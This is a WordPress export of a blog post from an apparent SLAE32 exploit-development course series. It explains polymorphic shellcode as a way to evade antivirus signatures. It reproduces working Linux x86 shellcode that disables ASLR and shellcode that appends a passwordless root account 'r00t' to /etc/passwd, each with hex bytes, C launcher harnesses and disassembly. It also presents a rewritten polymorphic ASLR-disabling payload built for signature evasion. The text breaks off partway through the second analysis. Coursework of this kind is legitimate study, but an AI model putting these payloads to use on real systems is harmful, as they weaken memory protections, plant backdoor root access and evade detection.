{"id":286,"date":"2022-05-15T20:53:04","date_gmt":"2022-05-15T20:53:04","guid":{"rendered":"https:\/\/jacklgmcbride.co.uk\/blog\/?p=286"},"modified":"2023-10-06T10:30:14","modified_gmt":"2023-10-06T10:30:14","slug":"slae32-assignment-6-polymorphic-shellcode","status":"publish","type":"post","link":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/2022\/05\/15\/slae32-assignment-6-polymorphic-shellcode\/","title":{"rendered":"SLAE32 Assignment #6: Polymorphic Shellcode"},"content":{"rendered":"\n<p>In this blog post, we will be covering the concept of polymorphism, and how it can be used to modify shellcode to bypass antivirus signature detection.<\/p>\n\n\n\n<p>This post follows on in our blog series created for the <a href=\"https:\/\/www.pentesteracademy.com\/course?id=3\">SLAE32<\/a> certification course provided by Pentester Academy.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Overview<\/h2>\n\n\n\n<p>Antivirus solutions tend to rely on two main detection mechanisms in order to identify malicious code. These are behavioural analysis, and signature detection. In signature detection, the AV engine tends to search shellcode for commonly known sequences of instructions, or 'patterns' which are known to be malicious. This makes it easy to fingerprint particular classes of malware with a simple pattern matching algorithm.<\/p>\n\n\n\n<p>A lot of the time, there is an emphasis on efficiency in shellcode. In general, this means that the smaller and more precisely a piece of shellcode carries out its intended action, the better. However, when it comes to comparing shellcode samples side by side, often many of them will look very similar at an instruction-by-instruction level.<\/p>\n\n\n\n<p>Taking Metasploit as an example, the well known 'shikata_ga_nai' encoder is known to be easily fingerprinted by most antivirus engines in use today, given its use of a commonly recognised decoder stub. This <a href=\"https:\/\/www.boozallen.com\/insights\/cyber\/shellcode\/shikata-ga-nai-encoder.html\">article<\/a> provides good coverage on how a simple Yara rule can be used to identify a sample of 236 payloads encoded using this particular encoder.<\/p>\n\n\n\n<p>This is where polymorphism comes in. The core idea behind polymorphism it is to take a piece of shellcode and replace its instructions with those which perform equivalent functionality. The idea is to increase the level of obscurity and differentiate byte patterns which might commonly be shared between shellcode variants. Ultimately, the goal is for the shellcode to perform the same action, but appear different at a signature level.<\/p>\n\n\n\n<p>In this blog post, we will be taking three shellcode examples from <a href=\"https:\/\/shell-storm.org\/shellcode\/\">ShellStorm<\/a> and applying this principle of polymorphism. Our chosen shellcodes are:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Shellcode 1: - <a href=\"https:\/\/shell-storm.org\/shellcode\/files\/shellcode-813.php\">Linux\/x86 - ASLR deactivation - 83 bytes<\/a> <em>by Jean Pascal Pereira<\/em><\/li>\n\n\n\n<li>Shellcode 2: - <a href=\"https:\/\/shell-storm.org\/shellcode\/files\/shellcode-211.php\">Linux\/x86 - add root user (r00t) with no password to \/etc\/passwd - 69 bytes<\/a> <em>by Kris Katterjohn<\/em><\/li>\n\n\n\n<li>Shellcode 3: - <a href=\"https:\/\/shell-storm.org\/shellcode\/files\/shellcode-545.php\">Linux\/x86 - execve() of \/sbin\/iptables -F - 70 bytes<\/a> <em>by zillion<\/em><\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Shellcode 1: Linux\/x86 - ASLR deactivation<\/h2>\n\n\n\n<p>The first shellcode we will look at is said to deactivate ASLR. ASLR, or Address Space Layout Randomisation, was introduced to Linux in 2001 in order to randomise memory segments in a given program. This would mean that any exploits which rely on static memory address to work correctly would fail, as it would no longer be possible to pre-emptively determine where your shellcode would end up in memory following exploitation.<\/p>\n\n\n\n<p>Modern Linux kernels have this setting enabled by default, by setting the value <strong>2<\/strong> in the file \/proc\/sys\/kernel\/randomize_va_space:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(root\u327fkali)-&#x5B;\/home\/jack\/SLAE32\/Assignment 6: Polymorphism]\n\u2514\u2500# cat \/proc\/sys\/kernel\/randomize_va_space                                                         1 \u2699\n2\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508114719.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>From this <a href=\"https:\/\/linux-audit.com\/linux-aslr-and-kernelrandomize_va_space-setting\/\">website<\/a> we understand that there are three main settings for ASLR:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>0 \u2013 ASLR is disabled. Everything is static.<\/li>\n\n\n\n<li>1 \u2013 Address space randomisation. Shared libraries, stack, mmap(), VDSO and heap are randomised.<\/li>\n\n\n\n<li>2 \u2013 Complete randomisation. In addition to the randomisation in setting 1, memory managed through brk() is also randomised.<\/li>\n<\/ul>\n\n\n\n<p>We can temporarily disable ASLR by setting this value to 0. Next, we will analyse the shellcode sample to determine if this is what it actually does when executed.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Ndisasm Analysis<\/h3>\n\n\n\n<p>The shellcode obtained from shell-storm is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n\/*\nTitle:  Linux x86 ASLR deactivation - 83 bytes\nAuthor: Jean Pascal Pereira &lt;pereira@secbiz.de&gt;\nWeb:    http:\/\/0xffe4.org\n\nDisassembly of section .text:\n\n08048060 &lt;_start&gt;:\n 8048060:       31 c0                   xor    %eax,%eax\n 8048062:       50                      push   %eax\n 8048063:       68 70 61 63 65          push   $0x65636170\n 8048068:       68 76 61 5f 73          push   $0x735f6176\n 804806d:       68 69 7a 65 5f          push   $0x5f657a69\n 8048072:       68 6e 64 6f 6d          push   $0x6d6f646e\n 8048077:       68 6c 2f 72 61          push   $0x61722f6c\n 804807c:       68 65 72 6e 65          push   $0x656e7265\n 8048081:       68 79 73 2f 6b          push   $0x6b2f7379\n 8048086:       68 6f 63 2f 73          push   $0x732f636f\n 804808b:       68 2f 2f 70 72          push   $0x72702f2f\n 8048090:       89 e3                   mov    %esp,%ebx\n 8048092:       66 b9 bc 02             mov    $0x2bc,%cx\n 8048096:       b0 08                   mov    $0x8,%al\n 8048098:       cd 80                   int    $0x80\n 804809a:       89 c3                   mov    %eax,%ebx\n 804809c:       50                      push   %eax\n 804809d:       66 ba 30 3a             mov    $0x3a30,%dx\n 80480a1:       66 52                   push   %dx\n 80480a3:       89 e1                   mov    %esp,%ecx\n 80480a5:       31 d2                   xor    %edx,%edx\n 80480a7:       42                      inc    %edx\n 80480a8:       b0 04                   mov    $0x4,%al\n 80480aa:       cd 80                   int    $0x80\n 80480ac:       b0 06                   mov    $0x6,%al\n 80480ae:       cd 80                   int    $0x80\n 80480b0:       40                      inc    %eax\n 80480b1:       cd 80                   int    $0x80\n\n*\/\n\n#include &lt;stdio.h&gt;\n\nchar shellcode&#x5B;] = &quot;\\x31\\xc0\\x50\\x68\\x70\\x61\\x63\\x65\\x68\\x76\\x61\\x5f\\x73\\x68&quot;\n                   &quot;\\x69\\x7a\\x65\\x5f\\x68\\x6e\\x64\\x6f\\x6d\\x68\\x6c\\x2f\\x72\\x61&quot;\n                   &quot;\\x68\\x65\\x72\\x6e\\x65\\x68\\x79\\x73\\x2f\\x6b\\x68\\x6f\\x63\\x2f&quot;\n                   &quot;\\x73\\x68\\x2f\\x2f\\x70\\x72\\x89\\xe3\\x66\\xb9\\xbc\\x02\\xb0\\x08&quot;\n                   &quot;\\xcd\\x80\\x89\\xc3\\x50\\x66\\xba\\x30\\x3a\\x66\\x52\\x89\\xe1\\x31&quot;\n                   &quot;\\xd2\\x42\\xb0\\x04\\xcd\\x80\\xb0\\x06\\xcd\\x80\\x40\\xcd\\x80&quot;;\n\nint main()\n{\n  fprintf(stdout,&quot;Lenght: %d\\n&quot;,strlen(shellcode));\n  (*(void  (*)()) shellcode)();\n}\n<\/pre><\/div>\n\n\n<p>To begin, we disassemble the shellcode using ndisasm.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\necho -ne &quot;\\x31\\xc0\\x50\\x68\\x70\\x61\\x63\\x65\\x68\\x76\\x61\\x5f\\x73\\x68\\x69\\x7a\\x65\\x5f\\x68\\x6e\\x64\\x6f\\x6d\\x68\\x6c\\x2f\\x72\\x61\\x68\\x65\\x72\\x6e\\x65\\x68\\x79\\x73\\x2f\\x6b\\x68\\x6f\\x63\\x2f\\x73\\x68\\x2f\\x2f\\x70\\x72\\x89\\xe3\\x66\\xb9\\xbc\\x02\\xb0\\x08\\xcd\\x80\\x89\\xc3\\x50\\x66\\xba\\x30\\x3a\\x66\\x52\\x89\\xe1\\x31\\xd2\\x42\\xb0\\x04\\xcd\\x80\\xb0\\x06\\xcd\\x80\\x40\\xcd\\x80&quot; | ndisasm -u -\n00000000  31C0              xor eax,eax\n00000002  50                push eax\n00000003  6870616365        push dword 0x65636170\n00000008  6876615F73        push dword 0x735f6176\n0000000D  68697A655F        push dword 0x5f657a69\n00000012  686E646F6D        push dword 0x6d6f646e\n00000017  686C2F7261        push dword 0x61722f6c\n0000001C  6865726E65        push dword 0x656e7265\n00000021  6879732F6B        push dword 0x6b2f7379\n00000026  686F632F73        push dword 0x732f636f\n0000002B  682F2F7072        push dword 0x72702f2f\n00000030  89E3              mov ebx,esp\n00000032  66B9BC02          mov cx,0x2bc\n00000036  B008              mov al,0x8\n00000038  CD80              int 0x80\n0000003A  89C3              mov ebx,eax\n0000003C  50                push eax\n0000003D  66BA303A          mov dx,0x3a30\n00000041  6652              push dx\n00000043  89E1              mov ecx,esp\n00000045  31D2              xor edx,edx\n00000047  42                inc edx\n00000048  B004              mov al,0x4\n0000004A  CD80              int 0x80\n0000004C  B006              mov al,0x6\n0000004E  CD80              int 0x80\n00000050  40                inc eax\n00000051  CD80              int 0x80\n<\/pre><\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">GDB Analysis<\/h3>\n\n\n\n<p>Now that we have obtained the raw assembly instructions, we next look at performing analysis in GDB.<\/p>\n\n\n\n<p>To begin, we take the shellcode buffer and insert it into our C skeleton program:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n#include&lt;stdio.h&gt;\n#include&lt;string.h&gt;\n\nunsigned char code&#x5B;] = \\\n&quot;\\x31\\xc0\\x50\\x68\\x70\\x61\\x63\\x65\\x68\\x76\\x61\\x5f\\x73\\x68\\x69\\x7a\\x65\\x5f\\x68\\x6e\\x64\\x6f\\x6d\\x68\\x6c\\x2f\\x72\\x61\\x68\\x65\\x72\\x6e\\x65\\x68\\x79\\x73\\x2f\\x6b\\x68\\x6f\\x63\\x2f\\x73\\x68\\x2f\\x2f\\x70\\x72\\x89\\xe3\\x66\\xb9\\xbc\\x02\\xb0\\x08\\xcd\\x80\\x89\\xc3\\x50\\x66\\xba\\x30\\x3a\\x66\\x52\\x89\\xe1\\x31\\xd2\\x42\\xb0\\x04\\xcd\\x80\\xb0\\x06\\xcd\\x80\\x40\\xcd\\x80&quot;;\n\nint main()\n{\n\n        printf(&quot;Shellcode Length:  %d\\n&quot;, strlen(code));\n\n        int (*ret)() = (int(*)())code;\n\n        ret();\n\n}\n<\/pre><\/div>\n\n\n<p>We compile this with GCC:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(root\u327fkali)-&#x5B;\/home\/jack\/SLAE32\/Assignment 6: Polymorphism]\n\u2514\u2500# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode\n<\/pre><\/div>\n\n\n<p>Then, we fire up GDB with the PEDA plugin enabled and set a breakpoint on the main function:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508120406.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We hit the breakpoint and disassemble the <strong>code<\/strong> variable containing the shellcode.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508120445.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We then set a breakpoint to the first instruction and begin our analysis.<\/p>\n\n\n\n<p>We come to our first set of interesting instructions, which involve pushing several hex encoded strings to the stack.<\/p>\n\n\n\n<p>After the first PUSH instruction is executed, we inspect the stack and see the first string, \"pace\".<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508121456.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>This appears to be the end of the filepath '\/proc\/sys\/kernel\/randomize_va_space'.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508121555.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Iterating over the rest of the PUSH instructions, we construct the complete string, confirming the intention of the instructions is to push the file pathname to the stack for later use.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508121731.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>After the pathname is pushed to the stack, we see that it is moved into the <strong>EBX<\/strong> register. Next, hex value <strong>0x2bc<\/strong> is moved into the <strong>ECX<\/strong> register, and <strong>0x8<\/strong> is moved into <strong>AL<\/strong>. Based on the syscall number, this indicates a syscall to the <strong>creat<\/strong> function is imminent.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508122130.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Below is the function header for <strong>creat<\/strong>:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint creat(const char *pathname, mode_t mode);\n<\/pre><\/div>\n\n\n<p>From our analysis above, we can deduce that the <strong>creat<\/strong> syscall is being used to open or create a file at the given <strong>pathname<\/strong> of ''\/proc\/sys\/kernel\/randomize_va_space' with <strong>mode_t<\/strong> set to <strong>0x2bc<\/strong> or <strong>700<\/strong> in decimal.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508123120.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>In this case, as <strong>700<\/strong> is chosen, this sets the user context in which the shell code is running to have full read, write and execute permissions over the file.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508122435.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Once this file is open, a file descriptor (<strong>fd<\/strong>) value is stored in <strong>EAX<\/strong>. The shellcode moves this value into <strong>EBX<\/strong> register with the <strong>mov<\/strong> instruction, and pushes it to the stack. Next, the value <strong>0x3a30<\/strong> is moved into the <strong>DX<\/strong> register and pushed to the stack, before <strong>ESP<\/strong> is moved into <strong>ECX<\/strong> and <strong>EDX<\/strong> is cleared. The value <strong>0x3a30<\/strong> is equivalent to the ascii representation \"<strong>:0<\/strong>\".<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508123045.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Following this, the value <strong>0x4<\/strong> is moved into <strong>AL<\/strong>. Based on the syscall number, this indicates a syscall to the <strong>write<\/strong> function will be made.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508123307.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Below is the function header for <strong>write<\/strong>:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nssize_t write(int fd, const void *buf, size_t count);\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508123635.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Following the syscall, the shellcode simply moves the value <strong>0x6<\/strong> into the <strong>AL<\/strong> register, which is the syscall for <strong>close<\/strong>, effectively closing the file.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508123824.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We confirm the syscall for <strong>close<\/strong> as follows:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508123727.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Upon the file being successfully closed, the value <strong>0x0<\/strong> is moved into <strong>EAX<\/strong>. This means that the shellcode just has to increment <strong>EAX<\/strong>, setting it to <strong>0x1<\/strong> to contain the syscall for <strong>exit<\/strong>. This will gracefully exit the shellcode.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508124038.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We check the \/proc\/sys\/kernel\/randomize_va_space file and confirm that it has been changed to contain '0', effectively disabling ASLR as intended.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508124121.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Shellcode 1: Polymorphic version<\/h3>\n\n\n\n<p>Before we make any changes to the assembly instructions, we create a copy of the original in a separate file as below. The original shellcode size is <strong>83 bytes<\/strong>:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n; Linux x86 ASLR deactivation - 83 bytes\n; Author: Jean Pascal Pereira &lt;pereira@secbiz.de&gt;\n; Website: http:\/\/0xffe4.org\n;\n; Purpose: SLAE32 exam assignment\n;\n;\n; Assignment 6: Polymorphism\n\nglobal _start\n\nsection .text\n\n_start:\n        xor eax,eax \n        push eax \n        push dword 0x65636170\n        push dword 0x735f6176\n        push dword 0x5f657a69\n        push dword 0x6d6f646e\n        push dword 0x61722f6c\n        push dword 0x656e7265\n        push dword 0x6b2f7379\n        push dword 0x732f636f\n        push dword 0x72702f2f\n        mov ebx,esp \n        mov cx,0x2bc \n        mov al,0x8 \n        int 0x80 \n        mov ebx,eax \n        push eax \n        mov dx,0x3a30 \n        push dx \n        mov ecx,esp \n        xor edx,edx \n        inc edx \n        mov al,0x4 \n        int 0x80 \n        mov al,0x6 \n        int 0x80 \n        inc eax \n        int 0x80\n<\/pre><\/div>\n\n\n<p>Our updated polymorphic version is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n; disable_aslr_polymorphic.nasm - 71 bytes\n; Author: Jack McBride (PA-6483)\n; Website:  https:\/\/jacklgmcbride.co.uk\n;\n; Purpose: SLAE32 exam assignment\n;\n;\n; Assignment 6: Polymorphism\n\nglobal _start\n\nsection .text\n\n_start:\n        jmp _aslr\n\n_main:\n        xor eax, eax\n        pop ebx\n        mov cx,0x2bc \n        mov al,0x8 \n        int 0x80 \n        mov ebx,eax \n        push byte 0x30\n        mov ecx,esp \n        inc edx \n        mov al,0x4 \n        int 0x80 \n        mov al,0x6 \n        int 0x80 \n        inc eax \n        int 0x80\n\n_aslr:\n        call _main\n        db '\/proc\/sys\/kernel\/randomize_va__space'\n<\/pre><\/div>\n\n\n<p>Our <strong>polymorphic<\/strong> version is <strong>71 bytes<\/strong> (12 bytes less than the original) = <strong>15.5% size decrease<\/strong>.<\/p>\n\n\n\n<p>In the original, the main standout feature is the 9 push instructions used to push the file path <strong>\/proc\/sys\/kernel\/randomize_va_space<\/strong> to the stack.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508150340.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Instead of using the stack technique, our polymorphic version instead uses the <strong>jmp-call-pop<\/strong> technique to pop the pathname argument into the <strong>EBX<\/strong> register. In this way, the previously implemented push instructions are avoided.<\/p>\n\n\n\n<p>Additionally, the call to the <strong>write<\/strong> syscall which originally used <strong>0x3a30<\/strong> has been truncated to a simple <strong>push byte 0x30<\/strong> instruction, as writing the value '0' into the randomize_va_space file was found to be sufficient.<\/p>\n\n\n\n<p>To further consolidate on space, the polymorphic version removes unnecessary calls to clear or increment registers which were found to be unused.<\/p>\n\n\n\n<p>We run the new polymorphic shellcode and confirm that it works as expected:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220508151431.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Shellcode 2: Linux\/x86 - add root user (r00t) with no password to \/etc\/passwd<\/h2>\n\n\n\n<p>The next shellcode we will look at is said to add a passwordless local account with root permissions, under the name of 'r00t'. The functionality of this is quite self-explanatory so we will jump into performing our analysis with ndisasm.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Ndisasm Analysis<\/h3>\n\n\n\n<p>The shellcode obtained from shell-storm is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n\/* By Kris Katterjohn 11\/14\/2006\n *\n * 69 byte shellcode to add root user 'r00t' with no password to \/etc\/passwd\n *\n * for Linux\/x86\n *\n *\n *\n * section .text\n *\n *      global _start\n *\n * _start:\n *\n * ; open(&quot;\/etc\/\/passwd&quot;, O_WRONLY | O_APPEND)\n *\n *      push byte 5\n *      pop eax\n *      xor ecx, ecx\n *      push ecx\n *      push 0x64777373\n *      push 0x61702f2f\n *      push 0x6374652f\n *      mov ebx, esp\n *      mov cx, 02001Q\n *      int 0x80\n *\n *      mov ebx, eax\n *\n * ; write(ebx, &quot;r00t::0:0:::&quot;, 12)\n *\n *      push byte 4\n *      pop eax\n *      xor edx, edx\n *      push edx\n *      push 0x3a3a3a30\n *      push 0x3a303a3a\n *      push 0x74303072\n *      mov ecx, esp\n *      push byte 12\n *      pop edx\n *      int 0x80\n *\n * ; close(ebx)\n *\n *      push byte 6\n *      pop eax\n *      int 0x80\n *\n * ; exit()\n *\n *      push byte 1\n *      pop eax\n *      int 0x80\n *\/\n\nmain()\n{\n       char shellcode&#x5B;] =\n               &quot;\\x6a\\x05\\x58\\x31\\xc9\\x51\\x68\\x73\\x73\\x77\\x64\\x68&quot;\n               &quot;\\x2f\\x2f\\x70\\x61\\x68\\x2f\\x65\\x74\\x63\\x89\\xe3\\x66&quot;\n               &quot;\\xb9\\x01\\x04\\xcd\\x80\\x89\\xc3\\x6a\\x04\\x58\\x31\\xd2&quot;\n               &quot;\\x52\\x68\\x30\\x3a\\x3a\\x3a\\x68\\x3a\\x3a\\x30\\x3a\\x68&quot;\n               &quot;\\x72\\x30\\x30\\x74\\x89\\xe1\\x6a\\x0c\\x5a\\xcd\\x80\\x6a&quot;\n               &quot;\\x06\\x58\\xcd\\x80\\x6a\\x01\\x58\\xcd\\x80&quot;;\n\n       (*(void (*)()) shellcode)();\n}\n--\n<\/pre><\/div>\n\n\n<p>To begin, we once again disassemble the shellcode using ndisasm:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\necho -ne &quot;\\x6a\\x05\\x58\\x31\\xc9\\x51\\x68\\x73\\x73\\x77\\x64\\x68\\x2f\\x2f\\x70\\x61\\x68\\x2f\\x65\\x74\\x63\\x89\\xe3\\x66\\xb9\\x01\\x04\\xcd\\x80\\x89\\xc3\\x6a\\x04\\x58\\x31\\xd2\\x52\\x68\\x30\\x3a\\x3a\\x3a\\x68\\x3a\\x3a\\x30\\x3a\\x68\\x72\\x30\\x30\\x74\\x89\\xe1\\x6a\\x0c\\x5a\\xcd\\x80\\x6a\\x06\\x58\\xcd\\x80\\x6a\\x01\\x58\\xcd\\x80&quot; | ndisasm -u -\n00000000  6A05              push byte +0x5\n00000002  58                pop eax\n00000003  31C9              xor ecx,ecx\n00000005  51                push ecx\n00000006  6873737764        push dword 0x64777373\n0000000B  682F2F7061        push dword 0x61702f2f\n00000010  682F657463        push dword 0x6374652f\n00000015  89E3              mov ebx,esp\n00000017  66B90104          mov cx,0x401\n0000001B  CD80              int 0x80\n0000001D  89C3              mov ebx,eax\n0000001F  6A04              push byte +0x4\n00000021  58                pop eax\n00000022  31D2              xor edx,edx\n00000024  52                push edx\n00000025  68303A3A3A        push dword 0x3a3a3a30\n0000002A  683A3A303A        push dword 0x3a303a3a\n0000002F  6872303074        push dword 0x74303072\n00000034  89E1              mov ecx,esp\n00000036  6A0C              push byte +0xc\n00000038  5A                pop edx\n00000039  CD80              int 0x80\n0000003B  6A06              push byte +0x6\n0000003D  58                pop eax\n0000003E  CD80              int 0x80\n00000040  6A01              push byte +0x1\n00000042  58                pop eax\n00000043  CD80              int 0x80\n<\/pre><\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">GDB Analysis<\/h3>\n\n\n\n<p>Now that we have obtained the raw assembly instructions, we next look at performing analysis using GDB.<\/p>\n\n\n\n<p>To begin, we take the shellcode buffer and insert it into our C skeleton program:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n#include&lt;stdio.h&gt;\n#include&lt;string.h&gt;\n\nunsigned char code&#x5B;] = \\\n&quot;\\x6a\\x05\\x58\\x31\\xc9\\x51\\x68\\x73\\x73\\x77\\x64\\x68\\x2f\\x2f\\x70\\x61\\x68\\x2f\\x65\\x74\\x63\\x89\\xe3\\x66\\xb9\\x01\\x04\\xcd\\x80\\x89\\xc3\\x6a\\x04\\x58\\x31\\xd2\\x52\\x68\\x30\\x3a\\x3a\\x3a\\x68\\x3a\\x3a\\x30\\x3a\\x68\\x72\\x30\\x30\\x74\\x89\\xe1\\x6a\\x0c\\x5a\\xcd\\x80\\x6a\\x06\\x58\\xcd\\x80\\x6a\\x01\\x58\\xcd\\x80&quot;;\n\nint main()\n{\n\n        printf(&quot;Shellcode Length:  %d\\n&quot;, strlen(code));\n\n        int (*ret)() = (int(*)())code;\n\n        ret();\n\n}\n<\/pre><\/div>\n\n\n<p>We compile it with GCC:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(root\u327fkali)-&#x5B;\/home\/jack\/SLAE32\/Assignment 6: Polymorphism]\n\u2514\u2500# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode\n<\/pre><\/div>\n\n\n<p>We then start GDB and set two breakpoints: one on the <strong>main<\/strong> function, and the next at the first assembly instruction in the <strong>code<\/strong> variable as follows:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220509103141.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>After the initial instructions, we see that the string <strong>\/etc\/passwd<\/strong> is pushed in reverse to the stack:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220509103604.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The function header for the <strong>open<\/strong> syscall is as follows:<\/p>\n\n\n<div 